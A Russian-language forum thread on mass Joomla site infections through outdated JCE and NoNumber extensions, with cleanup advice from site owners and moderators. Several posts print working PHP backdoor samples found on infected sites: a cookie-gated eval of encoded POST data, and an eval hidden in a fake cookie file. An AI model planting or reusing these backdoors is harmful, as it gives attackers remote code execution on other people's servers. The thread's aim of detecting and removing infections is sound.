С чем связаны все последние заражения сайтов - Безопасность сайтов на Joomla

Напишу кратко, решать самим, что и как Вам делать.

1. Старые версии движка, ну в прочем для многих не открытие. И уж давно пора все обновить до последних актуальных в своей линейке.
2. Редактор JCE - его последнее время залатывали не раз.
3. NoNumber Framework Joomla - все расширения от NoNumber используют свой Framework, в нем была уязвимость, автор залатывал её, потом переход был на платные версии, может ошибаюсь но, сейчас видимо заплатка прохудилась и скорей всего не будет поддержке старой версии. Получается версии 1.* уязвимы

остальное все не существенно, массово ломятся через п.2 и п.3

Вывод прост или требуется при использовании постоянно следить и мониторить обновления этих расширений, вовремя обновлять если используете, либо придется чистить сайты, думаю некоторым пользователям постоянно(все зависит от того все ли удалите), либо полностью отказаться от их использования. Кому то почистить не составит труда а кто то будет возиться неделю и более.
 
Взлом происходит просто, заливается файл для выполнения POST запроса, либо сразу *.php или *.gif *.png *.txt  через него дергают shell со стороннего сайта, залив его на ваш сайт получают доступ к файлам, если у Вас не один сайт в папке к примеру как на шараде хост, то все папки/файлы сайта становятся полностью доступны, если у Вас к примеру vps/vds и права на папки разграничены у каждого сайта свой пользователь, то папки/файлы доступны одного сайта, если конечно серверная часть настроена правильно

Теперь о важном, из выше написанного каждый поймет что если сайт не один в папке пользователя сервера, то чистить придется все, чистка не просто пробежаться сканерами и не понять что делать, чистка это не благодарный труд, который приходится делать, как вариант если сайтов много то чистить их на хосте может и не получится, причина простая если ваш сайт мониториться ботами, то почистив скажем 3 сайта из пяти вы можете при чистки остальных уже получить залитый шел на почищенные, т.е. при работе по чистки необходимо сайты отключать либо делать все локально скачав сайт.

Вся зараза это не те зловредные вставки в файлах *.js и *.php как дописка кода в начале или конце файла, сама зараза это отдельные файлы как самого shell так и прочее, те которые не имеют ни какого отношения к cms и установленным расширениям, сам файл либо называется post.php index.php либо с точки начинается .название.php либо набор цыфр и символов, может лежать множество раскиданы по папкам, обычно размер может совпадать ну с погрешностью 5-10кб плюс/минус, в последних топиках таких кодов за два месяца по вставляли  массу, просто чистить устанешь а тему на свалку не отправить, давайте свои найденные файлы и примеры их кодов перенесем сюда, а там почистим все, тут их просто разместим так- название директории,  файла и код под спойлер, это касается только коротких кодов, а остальное удалим из топиков где им не место

имхо, может не на 100% правильное, но мое
Для линейки Joomla 1.5.* думаю это последний массовый всплеск взломов, для тех пользователей кто полностью откажется от использования редактора JCE и расширений от NoNumber Framework(с конца 2011 года эти расширения латают и ни как не могут хорошую заплатку сделать или не хотят), остальные расширения не так массово используются, ну если кто то считает что не может отказаться от этих расширений то продолжать чистить сайт периодически, если не успеет обновить в момент выхода заплатки, на обновление есть 1-3дня в этот момент сайт не заражен, только залиты несколько файлов которые тоже необходимо найти и удалить, и это тоже не благодарный труд
 
последняя заплатка от NoNumber Framework заплатка

весь код попадает на сайты автоматически по командам ботов или с shell
ищите у себя файлы с таким содержанием(название роли не имеет дописать могут в любой файл движка и расширений), код может меняться но принцип такой, как видно отступ в право есть очень большой


еще


еще



вариантов еще много, содержимое может отличатся но переменные не переделать

День добрый. Интересная тема.
Вот что нашёл у себя на одном из сайтов:

создали в корневой папке под-папку /test/
прикрепляю то, что было внутри.

Sourcer конечно удобное дополнение было. А что вы посоветуете для замены? http://extensions.joomla.org/extensions/core-enhancements/coding-a-scripts-integration/custom-code-in-content  тут много всего, но какое то все не приглядное, Jumi тоже есть такой, который тоже прославился в свое время... как то Jumi не хочется использовать, да и ноунамбер весь подавно. Я сейчас много часов жизни потратил... и не факт что еще много не потрачу...  Нужна же какая то замена, хотя бы для удобной вставки кода. 

для удобной вставки кода просто модуля хватит самого что не на есть простого, либо от задачи думать, а ставить такую махину только для вставки кода думаю нет смысла как и для выведения модулей

Ну я в основном js или iframe вставляю, ну с YouTube ролики, счетчики всякие, Яндекс метрика, кнопки соц сетей "поделиться", код контекстной рекламы. Да и просто бывает охота в статью кусок произвольной верстки вставить HTML, и хочется что бы она не мешалась среди текста, а как бы отдельно была. Сорсер хорошо так подходил для этого всего, а лету, все просто... а Jumi этот, по крайней мере раньше, надо было в компоненте Jumi код вставлять и потом этот код с помощью тега в статью или в простой модуль - это тоже не удобно.
Чот у меня опять похоже лезет, хоть я ноунамбер поудалял все( еще файлы не видно что испортились, но вмешательство чувствуется - так как опять перестал работать модуль Tabs GK5 в прошлые разы, когда это началось, несколько дней назад - Tabs GK5 переставал работать и потом через некоторое время вылезало  *214afaae* в JS файлах.
После восстановления и удаления ноунаберов, сайт поработал часик и перестал, отключение модуля Tabs GK5 вернуло его к жизни, но похоже через некоторое время опять появится *214afaae*

нонамбер удалять надо вчистую (в т.ч. и папки) или просто плагин и остальное отключить можно?
пока не вижу, что с ним завязано, дали какой-то "навороченный" сайт переверстать и заодно посмотреть что лишнее, как грится, слайсом пройтись))))

смотри какой версии  NoNumber Framework стоит и если ниже того что в посте(приложил заплатку), можешь просто обновить на свой страх и риск, не советую ни оставить ни удалять каждый по своему решает что использовать что нет
а вообще удаляется через панель управления, если папки остаются то их вручную, обычно папки тоже удаляются но по разному бывает

[spoiler title=8af3.php]
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>
[/spoiler]

Вот это лежало в корне папки /images/:
[spoiler title=j.php]
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

125.253.118.88   FALSE   /about/   FALSE   0   <?eval(stripslashes(array_pop($_POST)))?>   1
[/spoiler]

[spoiler title=jos_ildq.php]
shell удален просьба не выкладывать[/spoiler]

У меня заразились 3 сайта на одном хосте и 1 на другом (просто там больше сайтов нет).
Везеде Joomla 1.5.26
Т.к. я не каждый день занимаюсь безопасностью сайтов, у меня ушло 3 дня на очистку и восстановление.
Вот что я сделал для очистки:

Ну от культуры взломов, сам в шоке
чистим сайты и на одних замечаем файлы .htaccess в папках images и tmp с закрытым доступом на файлы php и аналогичные, т.е. культурные взломщики сами себя страхуют, взломали сайты положили shell и закрыли для других доступ, чтоб конкуренты не пришли и не сломали 

а папку админа смысл запароливать? хотя у самого они все запаролены, сам не знаю зачем запаролил))) стреляли, говорят))) на всяк случай...

смешно, вот ломились отсюда 46.161.41.211
вот из открытых источников)) хм, и тел даже есть, подстава?)):

смех в том, что ломились на HTML голый))) ну-ну посмотрим на успехи)))

вот таким макаром

пост хороший, только дубль ни к чему, а вот что выполняет установленный фрейм в браузере, его назначение и цель

создавал дубль исключительно для того чтобы оповестить большее количество пользователей.
если не уместно, готов удалить.

на данный момент код ничего не делает во фрейме. по крайней мере по тому адресу который указан в теме по этому вирусу ничего подозрительного сейчас нет. конечно кроме того, что сайт передрали со стороны и используют код как контейнер. а вот коде который довелось еще раньше видеть мне - был обфусцированнй код главной Google - там выявить участок зараженного кода крайне сложно. потому что код крайне запутан. сейчас буду пробовать искать другие адреса фреймовых площадок. возможно где то код будет проще и я смогу определить. что делает вирус во фрейме.

кстати, господа, у которых еще случаются заражения js файлов фреймами. прошу отписаться здесь в теме. ваша помощь будет крайне полезна.

сейчас у все кто не дочистил, или просто подумал что это гадость пропала и ручки сложил, начнутся веселые деньки, объясню один факт, за этим ботом придут другие, и так как этот бот стер свои следы сделав все что ему полагалось, но он оставил двери, и натыкал их много, теперь те бот сети что не велики начнут раскладывать на сайтах свои гадости, потому что сайтов с дверьми множество, а где двери лежат они уже все прекрасно знают

@deutschlion
помню просили, код для разбора, бросил в личку 
что раскажите

У себя нашел шелл в папке modules/mod_joomla_support/

Плюс кучу фалов php и gif кодированных 64base

Замучался уже с этими вирусами. Определяю, что на сайте вирус, только потому что Google adwords выключает рекламу сайта, по причине обнаружения вредоносного ПО. Так никакой видимой активности нет.

Предпоследние 2 раза находил файла вида 63a2b4359.php (внутри ....<?php if(!empty($_COOKIE['__utma'])......)

Самого shell не знаю, нашел ли. Первый раз прогнал по архиву с сайтом антивирусом, он нашел сто с чем файлов, почистил их, может заодно и с шелл удалил.  Думал на этом все. Прошло две недели, Google опять вырубил рекламу.

В этот раз в архиве антивирус ничего не нашел. Но вручную обнаружил много файлов вида 63a2b4359.php  (внутри <?php if(!empty($_COOKIE['__utma'])......)

в папке images нашел  j.php  (внутри
_{# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
125.253.118.88   FALSE   /about/   FALSE   0   <?eval(stripslashes(array_pop($_POST)))?>   1} )

Во всех файлах .js в конце было дописано ;;;;;;;;;;;;;;;;;;;;;;;;;.


В этот раз вычистил все через сканер шеллов. Пару раз просмотрел вручную Удалил nonumber, JCE. Вроде норм

Начал анализировать логи, нашел 4 IP _{93.189.42.241, 78.110.50.153, 37.143.8.247, 46.254.17.192}

В логах типа _{37.143.8.247 - - [24/May/2013:23:45:28 +0400] "POST /components/com_contact/views/637069.php}

Хотел запретить доступ с этих IP, но на одном из них оказывается висит и мой сайт, остальные относятся к другим хостингам.

Сегодня Google опять вырубил рекламу)) Но сканер не нашел выше описанных файлов, по логам чисто. Не ясно из-за чего остановил рекламу. На всякий случай поставил чистый движок, и доставил компоненты, которые были установлены.

Ну от культуры взломов, сам в шоке
чистим сайты и на одних замечаем файлы .htaccess в папках images и tmp с закрытым доступом на файлы php и аналогичные, т.е. культурные взломщики сами себя страхуют, взломали сайты положили shell и закрыли для других доступ, чтоб конкуренты не пришли и не сломали  

А еще бывает и в добавок закрывают дыры за собой))

смешно, вот ломились отсюда 46.161.41.211
вот из открытых источников)) хм, и тел даже есть, подстава?)):

Спойлер

[свернуть]

смех в том, что ломились на HTML голый))) ну-ну посмотрим на успехи)))

вот таким макаром

Спойлер

[свернуть]

Как правило IP через сервисы подобным whois, показывают провайдера, а кому именно присвоил IP провайдер, знает только он сам. телефон также указывается провайдера.

У себя нашел шелл в папке modules/mod_joomla_support/

Плюс кучу фалов php и gif кодированных 64base

Оу...... друг, да у тебя целый набор по поднятию привелегий рута, начиная от bind-connect'a и заканчивая суидником, если бинд срабатывает, может имеет смысл хостера поменять?

А еще бывает и в добавок закрывают дыры за собой))

это Ваше ноу хау 

это Ваше ноу хау 

Остриш?! Что значит Наше? лудче бы по делу писал, а не тролил!

Остриш?! Что значит Наше? лудче бы по делу писал, а не тролил!

это как раз и по делу, продавая взломанный сервак или покупая, для устранения дальнейшего взлома т.е. чтоб его не произошло и можно было бы пользоваться в одиночку делается закрытие "окон" и "дверей"
ну объясни мне как человек весящий на нашей границе двух миров, какого хрена(хотел выразится догадываетесь как) после ботов умные школьники хакают сайты, по следам ботов, и считают себя хакерами, лошары-де-контаре практически все на той стороне границы, а не хакеры, единицы из них только могут себя с почетом так называть, остальные стадо которые возомнили себя таковыми, вот взломайте мне хост без поддержки php, или хотя бы с расширениями о которых нет информации в тырнете об их уязвимости, так же массово как боты делают сотни тысяч миллионы сайтов за неделю, а пока такое не можете? утрите сопли свои и занимайтесь уроками хочется им сказать
а списывать (имею ввиду по следам и оставленным уязвимостям ботов ходить) дело то не хитрое, и научиться ни чему не смогут и время взря потратят
вот объясни зачем на той стороне такое стадо нужно, могу предположить одно, все это стадо якобы хакеров несут одну миссию, на их машинах сидит троян для работы ботов, а эти овцы сами того и не знают даже не подозревают, во время тыкания по кнопкам не клавы а мышки, ну они же бараны писать даже не умеют им и ег придумали дак они и его сдать не могут
у меня нет других объяснения распространения в открытую инъекций

Вопервых, это вам у школьников и надо взять интервю. Во вторых, скажите мне, кто себя на той стороне называет хакерами, кроме школьников? хм... я таких незнаю!
Давайте список своих хостов, на досуге посмотрю, но не обещаю, яж не хакер).
Я бы вам нос утер, товарищь модератор, честно говоря в первые вижу такого модератора который на публику начинает выражать всплеск эмоций, модератор должен быть сдеражанным и рассудительным. И обьесните мне пожалуйста товарищь модератор flyingspook, вот вы рекомендуите чистить, обновлять компоненты, выстовлять нужные права, да, не спорю это помогает, но что если человеку к примеру нужен не шел... ни заразу какую нить повешать, а к примеру БД зарегестрированных пользователей "Потенциальный клиент на какой либо продукт", чем лично вы можите помочь пользователям сия раздела для устранения подобной потенциальной опасности?, чем можите помочь против ДДОСА?, граммотно выставить права, прописать нужный код в .htaccess'e? обновить компоненты?, интиресный вы человек, с уверенностью разбирающийся в своей ветки безопасности!))))))))))

ddos приплетенный ни к чему от него своя защита, от инъекций своя, это не сопоставимые вещи, ddos не даст взять данные, только на время положит сервер, от него есть защита и это уже полностью настраивается сервер и канал соединения, сайты тут не причем, если у вас такие познания в защите от ddos так поделитесь с сообществом как на шарада хосте защитить свой сайт от ddos атаки, как пользователю выполнить работу хостера за него, могу ответить за вас просто поставить лимит на количество запросов, но есть одно но есть такие сайте и сервисы прикрепленные к ним, что выставив лимит вы нарушите работу, и что тогда? ответ очевиден от ddos оберегает хостер свои каналы соединений через специальные шлюзы, если хостер такое не делает, хотя они за последний год зашевелились и уже даже предлагается это бесплатно как раньше было за плату, то менять надо такого хостера, и самое важное причем тут ddos и школьники с программой бота которые просто берут, что программу что данные из открытого доступа и по следам взломов повторяют их, смысл выкладывать информацию в доступ для них, вот в чем вопрос

ddos приплетенный ни к чему от него своя защита, от инъекций своя, это не сопоставимые вещи, ddos не даст взять данные, только на время положит сервер, от него есть защита и это уже полностью настраивается сервер и канал соединения, сайты тут не причем, если у вас такие познания в защите от ddos так поделитесь с сообществом как на шарада хосте защитить свой сайт от ddos атаки, как пользователю выполнить работу хостера за него, могу ответить за вас просто поставить лимит на количество запросов, но есть одно но есть такие сайте и сервисы прикрепленные к ним, что выставив лимит вы нарушите работу, и что тогда? ответ очевиден от ddos оберегает хостер свои каналы соединений через специальные шлюзы, если хостер такое не делает, хотя они за последний год зашевелились и уже даже предлагается это бесплатно как раньше было за плату, то менять надо такого хостера, и самое важное причем тут ddos и школьники с программой бота которые просто берут, что программу что данные из открытого доступа и по следам взломов повторяют их, смысл выкладывать информацию в доступ для них, вот в чем вопрос

на счет ddos'a согласен, погоречился. А то ,что выкладывается, это вообщем для тех кто разберается в вопросах безопасност. Пишут патчи, принимают какие либо меры, так как разработчики тоже за всем уследить не могут, а админы прогеры заботящиеся о своих сайтах, будучи осведомлены сами принимают какие либо меры, или другая сторона вопроса... Со многими сталкивался, которые не хотят переходить к примеру Joomla с ветки 1.5 на болие высокую, а патчь уже идет только под болие высокую, что тогда? осведомленный веб мастер самостоятельно начинает патчить свой компонент, то как школьники используют нформацию, за это они сами несут отвецтвеность, также как и веб мастер который начинает шевелиться только после того, когда нахватает заразы...

Сразу попрошу не пинайте сильно. Я не продвинутый программист, просто сделал когда-то свой сайтик-визитку, до всего доходил сам. Короче, последнее время от хостинга начали приходить сообщения о вредоносном содержимом на сайте. В основном это были jpeg картинки. Откуда они брались я как-то не вникал, просто удалял их и жил дальше. Но стала напрягать регулярность данных писем. Скачал весь сайт через Тотал командер на комп и проверил антивирусом. Антивирус выдал угрозу файла \public_html\administrator\components\com_jce\plugins\views\layout\tmpl\default.php
Удалять его я как-то опасаюсь, т.к. уже были случаи удаления не тех файлов после которых приходилось по новой весь сайт создавать.
Подскажите пожалуйста что делать с этим файлом, и вобще в нем-ли дело.
Только если можно, то по русски, так как половину терминов что тут употребляются я первый раз слышу. Для начала меня интересует можно-ли удалять этот файл. Если нет, то может что-то в нем изменить? Или дело не в нем? Комп проверил на вирусы, пароли поменял.
Спасибо всем кто поймет и попытается помочь.

1 заходите в панель управления
2 выберете установка/удаление
3 там закладка компоненты
4 находите JCE и удаляете
5 заходите по ftp папки administrator/components, components, plugins, media просматриваете на предмет остатков редактора JCE все что осталось ручками удаляете
6 из БД удаляете таблицы от JCE

если вам нужен редактор JCE и жить без него просто не можете)))

7 идете на сайт разработчика скачиваете последнюю версию
8 устанавливаете себе

и раз уж жить без него не возможна то каждую секунду читаете все что можно про него, и как только увидели новость про новую уязвимость устанавливаете новую версию где её закрыли, и повезет вам если вы прочитали раньше чем ваш сайт взломали, но сидеть вам придется круглые сутки и мониторить, либо построить жизнь на не использовании этого расширения

Весело. Привык просто уже к этому редактору. Попробуем без него. А может еще альтернативу ему подскажите? Не охота методом проб и ошибок опять какой-то дряни нахватать с других редакторов.

Привык просто уже к этому редактору. Попробуем без него. А может еще альтернативу ему подскажите?

TinyMCE чем не устраивает?
Параметры-Режим- Расширенный

Вот что значит лузер... ))) А я туда и не залезал никогда, попробовал в обычном режеме - фигня какая-то и стал искать другой редактор. Спасибо! Будем осваивать TinyMCE.

Спасибо, не буду рисковать, TinyMCE в расширенном режиме меня устраивает. Единственное столкнулся с другой проблемой. В настройках панели управления не могу поменять редактор. Уже JCE удалил, почистил все его хвосты во всех папках, а в настройках всеравно он стоит и при смене на TinyMCE/сохранить выдает (страница не доступна). Попробовал поменять другие пункты в настройках - та-же фигня. В ручную переписал в configuration.php (доступ стоит 744), но в настройках всеравно JCE стоит и на сохранение любых изменений выдает (страница не доступна). Я понимаю что это возможно уже не по этой теме, просто пошло одно за другим. Может кто сталкивался с этим?